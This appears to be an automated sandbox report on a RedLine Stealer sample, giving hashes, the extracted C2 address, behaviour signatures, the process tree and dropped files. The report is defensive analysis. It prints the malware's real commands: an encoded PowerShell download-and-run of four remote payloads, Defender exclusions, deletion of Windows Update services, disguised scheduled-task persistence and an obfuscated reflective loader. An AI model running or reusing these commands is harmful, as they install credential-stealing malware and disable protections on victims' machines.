Analysis

  • max time kernel
    153s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    05-02-2023 01:38

General

  • Target

    aa95d6c08ae9201828da23593e42df4a2e39ce82.exe

  • Size

    626KB

  • MD5

    47b01695ff80b03ae518b333163da42c

  • SHA1

    aa95d6c08ae9201828da23593e42df4a2e39ce82

  • SHA256

    474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e

  • SHA512

    886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466

  • SSDEEP

    6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 9 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:480
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:472
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
          2⤵
            PID:800
            • C:\Windows\system32\Dwm.exe
              "C:\Windows\system32\Dwm.exe"
              3⤵
                PID:1200
            • C:\Windows\system32\sppsvc.exe
              C:\Windows\system32\sppsvc.exe
              2⤵
                PID:304
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                2⤵
                  PID:1016
                • C:\Windows\system32\taskhost.exe
                  "taskhost.exe"
                  2⤵
                    PID:1112
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                    2⤵
                      PID:1032
                    • C:\Windows\System32\spoolsv.exe
                      C:\Windows\System32\spoolsv.exe
                      2⤵
                        PID:328
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:276
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs
                          2⤵
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          PID:864
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {857B7BEC-4838-4740-8D81-0B4BB2AECF7B} S-1-5-18:NT AUTHORITY\System:Service:
                            3⤵
                              PID:1172
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'erst'+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1528
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+'al'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1568
                            • C:\Windows\system32\taskeng.exe
                              taskeng.exe {BA7DDC48-177D-4526-80D6-4557B8EC0AE1} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]
                              3⤵
                                PID:952
                                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                  4⤵
                                  • Executes dropped EXE
                                  PID:1188
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                    5⤵
                                    • Creates scheduled task(s)
                                    PID:884
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService
                              2⤵
                                PID:836
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                2⤵
                                  PID:736
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k RPCSS
                                  2⤵
                                    PID:656
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k DcomLaunch
                                    2⤵
                                      PID:576
                                  • C:\Windows\system32\winlogon.exe
                                    winlogon.exe
                                    1⤵
                                      PID:420
                                      • C:\Windows\System32\dllhost.exe
                                        C:\Windows\System32\dllhost.exe /Processid:{532f8334-419a-4cfc-96be-c75a33686e44}
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1164
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:488
                                      • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                        wmiadap.exe /F /T /R
                                        1⤵
                                          PID:1716
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1248
                                          • C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe
                                            "C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe"
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of WriteProcessMemory
                                            PID:2020
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                              3⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1128
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
                                                4⤵
                                                • Blocklisted process makes network request
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:1104
                                                • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1348
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1148
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 48
                                                    6⤵
                                                    • Loads dropped DLL
                                                    • Program crash
                                                    PID:964
                                                • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:536
                                                • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                  5⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Drops file in Drivers directory
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:516
                                                • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2016
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                    6⤵
                                                    • Creates scheduled task(s)
                                                    PID:632
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 48
                                              3⤵
                                              • Program crash
                                              PID:2032
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                            2⤵
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1768
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1996
                                            • C:\Windows\System32\sc.exe
                                              sc stop UsoSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:916
                                            • C:\Windows\System32\sc.exe
                                              sc stop WaaSMedicSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:296
                                            • C:\Windows\System32\sc.exe
                                              sc stop wuauserv
                                              3⤵
                                              • Launches sc.exe
                                              PID:824
                                            • C:\Windows\System32\sc.exe
                                              sc stop bits
                                              3⤵
                                              • Launches sc.exe
                                              PID:1552
                                            • C:\Windows\System32\sc.exe
                                              sc stop dosvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:1092
                                            • C:\Windows\System32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                              3⤵
                                                PID:1796
                                              • C:\Windows\System32\reg.exe
                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                3⤵
                                                  PID:1240
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                  3⤵
                                                  • Modifies security service
                                                  PID:1812
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                  3⤵
                                                    PID:2036
                                                  • C:\Windows\System32\reg.exe
                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                    3⤵
                                                      PID:944
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1956
                                                    • C:\Windows\system32\schtasks.exe
                                                      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:1316
                                                  • C:\Windows\System32\dialer.exe
                                                    C:\Windows\System32\dialer.exe
                                                    2⤵
                                                      PID:1184
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "-1806176242237393214547689501-189789003615219280402145878167548908081305206280"
                                                    1⤵
                                                      PID:1424

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                      Filesize

                                                      455KB

                                                      MD5

                                                      ee0ad7cc2a5976a5c658da52092977a9

                                                      SHA1

                                                      c69b99d42a9f9886af74e6a75fd905a5d17d4792

                                                      SHA256

                                                      f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b

                                                      SHA512

                                                      ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      173b8e355228691f2657a2f79d14cb97

                                                      SHA1

                                                      aaf5d23358a6521d95b560b757c15c6d430164ce

                                                      SHA256

                                                      2180cdaae118fcb1c8217a08e3b36d008ab92d37aeb10c808f75fb14adc69a7d

                                                      SHA512

                                                      c39c5db8d80a4a73179b3b44fcd71f6024f7b6738b083901ba86317ba4f5870d86f1f25909bf18ef674fa44422725e5cf1adefd274e8dcf21524241b9d0e8fdf

                                                    • C:\Windows\System32\Tasks\Telemetry Logging

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      886c7464a00a827dce78417454da8ac3

                                                      SHA1

                                                      749dc011f0afe649811984b10d6437cb341b3c88

                                                      SHA256

                                                      2a32ffceb27e7a7450a39dbab28e9d02e3e72f23ce2502af0fd24541fb946a03

                                                      SHA512

                                                      65d019e92a63368c49081f3bd26404dec412f8b8b80a0416dd41a8e7daef518544b674221375fa0a2538373b2f7047276a3cf43404043d97e1dc00aeed1a826a

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • \Users\Admin\AppData\Local\Temp\SysApp.exe

                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

